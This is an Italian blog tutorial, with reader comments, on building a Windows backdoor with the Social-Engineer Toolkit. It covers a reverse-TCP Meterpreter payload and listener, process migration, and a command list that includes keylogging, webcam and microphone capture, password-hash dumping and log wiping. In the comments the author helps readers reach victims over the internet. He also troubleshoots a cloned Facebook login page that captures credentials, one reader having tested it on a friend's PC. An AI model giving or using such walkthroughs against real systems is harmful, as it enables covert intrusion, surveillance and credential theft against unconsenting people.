venerdì 4 marzo 2016

Kali Linux: Creare una backdoor per Windows utilizzando SET

Social-Engineer Toolkit (SET), scritto da David Kennedy (ReL1K), è un insieme di tool progettati per eseguire attacchi basati sull'ingegneria sociale. In quest'articolo mostrerò uno dei possibili attacchi realizzabili con questo toolkit incluso in Kali Linux che prevede la creazione di un file eseguibile che, se eseguito sulla macchina della vittima, apre una backdoor.
                 
ATTENZIONE:
Danneggiare un sistema informatico (anche da remoto) rappresenta un reato penale. Le informazioni presenti in quest'articolo vanno utilizzate solo per testare/verificare sistemi di cui si è titolari. Declino ogni responsabilità civile e penale derivante da un utilizzo non legale delle informazioni presentate in questo articolo a solo scopo didattico.

  • La prima operazione da effettuare è quella di avviare SET: da terminale eseguire il comando setoolkit oppure, dall'interfaccia grafica di Kali Linux (Versione 2016.1), cliccare su Applications>Social Engineering Tools>Social Engineering Toolkit.
    Social Engineering Tools
    FIG 1 - Social Engineering Tools
  • Dal menu che appare selezionare l'opzione 1) Social-Engineering Attacks
    FIG 2 - Social-Engineering Attacks
  • Selezionare l'opzione 4) Create a Payload and Listener.
    Create a Payload and Listener
    FIG 3 - Create a Payload and Listener
  • Selezionare 2) Windows Reverse_TCP Meterpreter.
    Windows Reverse_TCP Meterpreter
    FIG 4 - Windows Reverse_TCP Meterpreter
  • Indicare l'indirizzo IP che il payload deve contattare una volta che viene eseguito dalla vittima (indirizzo IP di chi attacca).
    IP Address
    FIG 5 - IP Address
  • Specificare la porta del listener (in genere 443) confermando con invio. Verrà creato un eseguibile chiamato payload.exe (in /root/.usr/payload.exe) che consente di aprire una backdoor sulla workstation della vittima.
    Porta su cui attendere la comunicazione del payload
    FIG 6 - Porta su cui attendere la comunicazione del payload

    Percorso del payload.exe da eseguire sulla macchina della vittima
    FIG 7 - Percorso del payload.exe da eseguire sulla macchina della vittima
  • A questo punto viene richiesto se si intende avviare il listener sulla macchina di chi sta eseguendo l'attacco. Digitare yes seguito da invio per avviare la msfconsole.
    Avvio del listener
    FIG 8 - Avvio del listener
  • Una volta che msfconsole è stata avviata non resta che attendere che il file payload.exe venga eseguito sulla macchina della vittima e verrà aperta una sessione di Meterpreter.
    Sessione Meterpreter
    FIG 9 - Sessione Meterpreter
  • Digitare il comando sessions -i 1 dove 1 rappresenta il numero della sessione che si intende selezionare (in FIG 9 è possibile vedere il numero della sessione nella dicitura session 1 opened)
    Attivare la sessione
    FIG 10 - Attivare la sessione
  • Per fare in modo che meterpreter rimanga aperto è necessario migrare il payload su un altro processo. Per eseguire questa operazione è necessario disporre del PDI (process ID) di un altro processo. Usare il comando ps per visualizzare i processi attualmente in esecuzione sulla macchina vittima. Una volta individuato il PID su cui vogliamo migrare utilizziamo il comando
    migrate <PID del processo>
    ad es
    migrate 4878
Digitando help visualizziamo l'elenco dei comandi che possiamo eseguire sulla macchina della vittima




Possiamo riavviare la postazione, trasferire file, terminare processi, prendere il controllo della webcam/microfono, ecc.

Di seguito un elenco dei comandi che è possibile eseguire:

Core Commands
=============

    Command                   Description
    -------                        -----------
    ?                               Help menu
    background                Backgrounds the current session
    bgkill                         Kills a background meterpreter script
    bglist                         Lists running background scripts
    bgrun                        Executes a meterpreter script as a background thread
    channel                     Displays information or control active channels
    close                         Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                           Terminate the meterpreter session
    get_timeouts             Get the current session timeout values
    help                          Help menu
    info                           Displays information about a Post module
    irb                            Drop into irb scripting mode
    load                          Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                     Migrate the server to another process
    quit                           Terminate the meterpreter session
    read                          Reads data from a channel
    resource                    Run the commands stored in a file
    run                            Executes a meterpreter script or Post module
    set_timeouts              Set the current session timeout values
    sleep                         Force Meterpreter to go quiet, then re-establish session.
    transport                   Change the current transport mechanism
    use                           Deprecated alias for 'load'
    uuid                          Get the UUID for the current session
    write                         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------             -----------
    cat                 Read the contents of a file to the screen
    cd                  Change directory
    dir                  List files (alias for ls)
    download        Download a file or directory
    edit                Edit a file
    getlwd            Print local working directory
    getwd             Print working directory
    lcd                 Change local working directory
    lpwd               Print local working directory
    ls                   List files
    mkdir             Make directory
    mv                 Move source to destination
    pwd                Print working directory
    rm                  Delete the specified file
    rmdir              Remove directory
    search            Search for files
    show_mount   List all mount points/logical drives
    upload            Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------             -----------
    arp                 Display the host ARP cache
    getproxy         Display the current proxy configuration
    ifconfig           Display interfaces
    ipconfig          Display interfaces
    netstat           Display the network connections
    portfwd          Forward a local port to a remote service
    route             View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------             -----------
    clearev           Clear the event log
    drop_token     Relinquishes any active impersonation token.
    execute          Execute a command
    getenv           Get one or more environment variable values
    getpid            Get the current process identifier
    getprivs         Attempt to enable all privileges available to the current process
    getsid            Get the SID of the user that the server is running as
    getuid            Get the user that the server is running as
    kill                 Terminate a process
    ps                  List running processes
    reboot            Reboots the remote computer
    reg                Modify and interact with the remote registry
    rev2self         Calls RevertToSelf() on the remote machine
    shell              Drop into a system command shell
    shutdown       Shuts down the remote computer
    steal_token    Attempts to steal an impersonation token from the target process
    suspend         Suspends or resumes a list of processes
    sysinfo          Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------              -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop        Get the current meterpreter desktop
    idletime             Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start    Start capturing keystrokes
    keyscan_stop     Stop capturing keystrokes
    screenshot         Grab a screenshot of the interactive desktop
    setdesktop         Change the meterpreters current desktop
    uictl                  Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------              -----------
    record_mic       Record audio from the default microphone for X seconds
    webcam_chat   Start a video chat
    webcam_list     List webcams
    webcam_snap  Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Priv: Elevate Commands
======================

    Command       Description
    -------             -----------
    getsystem       Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------             -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------             -----------
    timestomp     Manipulate file MACE attributes



16 commenti:

  1. ma funziona da remoto(a distanza)?

    RispondiElimina
    Risposte
    1. Si, funziona anche a distanza con opportuni accorgimenti. Ad es. bisogna utilizzare il proprio indirizzo pubblico (nel caso in cui non si disponga di un'IP fisso bisogna utilizzare appositi servizi), aprire le porte sul proprio router e impostare un portforwarding

      Elimina
  2. Ciao, ho installa SET su windows, e clonando i repository su github, ma ho sempre errori relativi a metasploit, ti chiedo dunque se per utilizzarlo al meglio, mi conviene ripartire l'HDD tra windows e linux per utilizzare al meglio SET, oppure posso utilizzarlo tranquillamente anche tramite windows? grazie

    RispondiElimina
    Risposte
    1. Ciao. In passato anche io ho avuto diversi problemi con la versione di Windows dovuti principalmente alle versioni non aggiornate del tool e dei framework. Personalmente in questi casi preferisco operare in ambiente Linux, in particolare con Kali linux che, oltre ad integrare SET, mette a disposizione moltissimi strumenti utili per il penetration testing. Con pochi comandi (vedi http://giovannilubrano.blogspot.it/2015/07/kali-linux-messaggio-something-went.html) è possibile aggiornare sia la distribuzione che SET all'ultima versione. Puoi ripartizionare il disco in modo da avere in dual boot Windows e Linux, installare Linux in una Virtual machine oppure, con pochi euro, puoi procurarti una pendrive usb e installarci su Kali Linux rendendola bootable. Io ho preferito quest'ultima opzione che mi consente di avere Kali Linux sempre con me e di poter avviarla da un qualsiasi PC.

      Elimina
  3. ciao, ho installato set su windows, clonando i repositry su github, ma continuo ad avere problemi con metasploit, come posso risolvere?

    RispondiElimina
    Risposte
    1. Ciao. In passato anche io ho avuto diversi problemi con la versione di Windows dovuti principalmente alle versioni non aggiornate del tool e dei framework. Personalmente in questi casi preferisco operare in ambiente Linux, in particolare con Kali linux che, oltre ad integrare SET, mette a disposizione moltissimi strumenti utili per il penetration testing. Con pochi comandi (vedi http://giovannilubrano.blogspot.it/2015/07/kali-linux-messaggio-something-went.html) è possibile aggiornare sia la distribuzione che SET all'ultima versione. Puoi ripartizionare il disco in modo da avere in dual boot Windows e Linux, installare Linux in una Virtual machine oppure, con pochi euro, puoi procurarti una pendrive usb e installarci su Kali Linux rendendola bootable. Io ho preferito quest'ultima opzione che mi consente di avere Kali Linux sempre con me e di poter avviarla da un qualsiasi PC.

      Elimina
  4. Ciao, il mio problema, ho fatto la prova in remoto con il pc di un amico, che quando ho aperto la porta 80 sul mio pc, e utilizzato no-ip per rendere l'ip statico, non riesco a connettermi nel mio pc in remoto.
    O meglio, ho creato un sito clone, nel senso che l'ha fatto set, una delle tante impostazioni, del login di facebook. Dall'altro pc mi compare la login di fb, inserendo l'ip del mio pc, quindi vuol dire che il mio pc in questo caso sta fungendo da web server, ma una volta che inserisco i dati che dovrebbero essere catturati dal pc dal terminale di set, ecco che si blocca tutto, ovvero classica schermata: impossibile raggiungere il sito, connessione negata.. Infatti poi controllando sul mio pc i dati non vengono catturati.
    Cosa che in locale funziona perfettamente.
    Gentilmente sapresti indicarmi quale potrebbe essere il problema?
    Per adesso ti ringrazio e saluto,
    ciao, Andrea

    RispondiElimina
    Risposte
    1. Quando la vittima inserisce le credenziali dovrebbe essere richiamata la pagina post.php che scrive le credenziali catturare e dirotta la vittima sulla pagina di facebook vera. Se si riceve un messaggio di accesso negato è possibile che ci sia un problema sui permessi sulla cartella /var/www (percorso dove dovrebbe essere creato il file contenente le credenziali rubate). Verifica i permessi su tale cartella e permetti la scrittura a chiunque.

      Elimina
    2. Ciao Giovanni,
      voglio scusarmi per il ritardo nella mia risposta, ho avuto un pò di problemi.
      Volevo ringraziarti, prima di ogni cosa.
      Ho fatto la prova con il pc di un amico mi sono collegato al mio con la porta 80 aperta, e ovviamente con set in funzione per catturare i dati, il mio ip è diventato statico con no-ip.
      Il problema, come ti dicevo, che comunque riesco a vedere dal pc del mio amico la pagina clonata sul mio pc in remoto, ma nel momento che inserisco i dati nel form e invio, compare pagina non disponibile, come se non ci fosse la linea, non è interessante, mentre l'importante che set poi riesca a catturare i dati, cosa che non avviene. Tutto questo in remoto funziona perfettamente.
      Cosa potrebbe essere?
      Per adesso ti saluto e ringrazio.
      Ciao

      Elimina
    3. Innanzitutto assicurati di aver installato l'ultima versione di SET. Puoi aggiornarlo seguendo le istruzioni che ho indicato qui https://giovannilubrano.blogspot.it/2015/07/kali-linux-messaggio-something-went.html.
      Assicurati di impostare il portforwarding sul tuo router in particolare della porta 80 e 443.
      Assicurati che siano impostati i permessi corretti sulla directory /var/www/html.
      All'interno della directory /var/www/html dovresti trovare 2 file: index.html (contentente la pagina clone) e post.php (che contiene le istruzioni per scrivere l'utenza e la password catturata all'interno di un file di testo di nome harvester). Apri il file index.html con un editor e cerca la stringa post.php. Dovresti trovare qualcosa come http://192.168.1.14/post.php ovviamente al posto dell'ip 192.168.1.14 assicurati che ci sia il tuo ip pubblico

      Elimina
  5. ciao,ho praticamente lo stesso problema, mi spiego: nel momento in cui clono una pagina esempio quella di facebook, se provo in locale il suo funzionamento, funge a meraviglia, il problema sorge nel momento in cui lo voglio provare su una macchina diversa, il browesr mi dice che il server non è raggiungibile. devo attivare apache? oppure devo effettuare qualche altra configurazione?
    grazie in anticipo,
    Dario

    RispondiElimina
    Risposte
    1. L'operazione che stai eseguendo è diversa da quello che è indicata in questo articolo. Stai creando un clone di una pagina per eseguire un attacco tramite phishing. Su una macchina diversa dici che non funziona, ma la macchina si trova sulla stessa rete locale? Se la macchina si trova all'esterno della rete locale allora è necessario specificare il tuo indirizzo IP esterno e procedere con il portforwarding sul router.

      Elimina
  6. scusami ma a me esce bad config che vuol dire...



    RispondiElimina
    Risposte
    1. Aggiorna il sistema e SET seguendo i passaggi indicati in http://giovannilubrano.blogspot.it/2015/07/kali-linux-messaggio-something-went.html
      Se il problema persiste dimmi in che punto visualizzi il messaggio di errore

      Elimina
    2. MI ESCE QUESTO..
      set:payloads> Do you want to start the payload and listener now? (yes/no):yes
      [*] Launching msfconsole, this could take a few to load. Be patient...


      ______________________________________________________________________________
      | |
      | 3Kom SuperHack II Logon |
      |______________________________________________________________________________|
      | |
      | |
      | |
      | User Name: [ security ] |
      | |
      | Password: [ ] |
      | |
      | |
      | |
      | [ OK ] |
      |______________________________________________________________________________|
      | |
      | http://metasploit.com |
      |______________________________________________________________________________|


      Taking notes in notepad? Have Metasploit Pro track & report
      your progress and findings -- learn more on http://rapid7.com/metasploit

      =[ metasploit v4.12.22-dev ]
      + -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
      + -- --=[ 455 payloads - 39 encoders - 8 nops ]
      + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

      [*] Processing /root/.set//meta_config for ERB directives.
      resource (/root/.set//meta_config)> use multi/handler
      resource (/root/.set//meta_config)> set payload windows/meterpreter/reverse_tcp
      payload => windows/meterpreter/reverse_tcp
      resource (/root/.set//meta_config)> set LHOST 151.56.198.175
      LHOST => 151.56.198.175
      resource (/root/.set//meta_config)> set LPORT 443
      LPORT => 443
      resource (/root/.set//meta_config)> set ExitOnSession false
      ExitOnSession => false
      resource (/root/.set//meta_config)> exploit -j
      [*] Exploit running as background job.

      [-] Handler failed to bind to 151.56.198.175:443:- -
      [*] Started reverse TCP handler on 0.0.0.0:443
      [*] Starting the payload handler...
      msf exploit(handler) >

      Elimina
    3. Il messaggio indica che non riesce a connettersi alla porta 443 su 151.56.198.175. I motivi possono essere diversi.
      - Assicurati che l'indirizzo IP sia corretto;
      - Verifica di aver effettuato correttamente il port forwarding sul router;
      - Verifica che non ci siano altri servizi in ascolto sulla porta 443, per farlo basta che lanci il comando netstat -an |grep LIST da una finestra terminale.
      - Prova a cambiare porta.

      Elimina

I messaggi sono soggetti a moderazione da parte dell'amministratore prima della loro pubblicazione.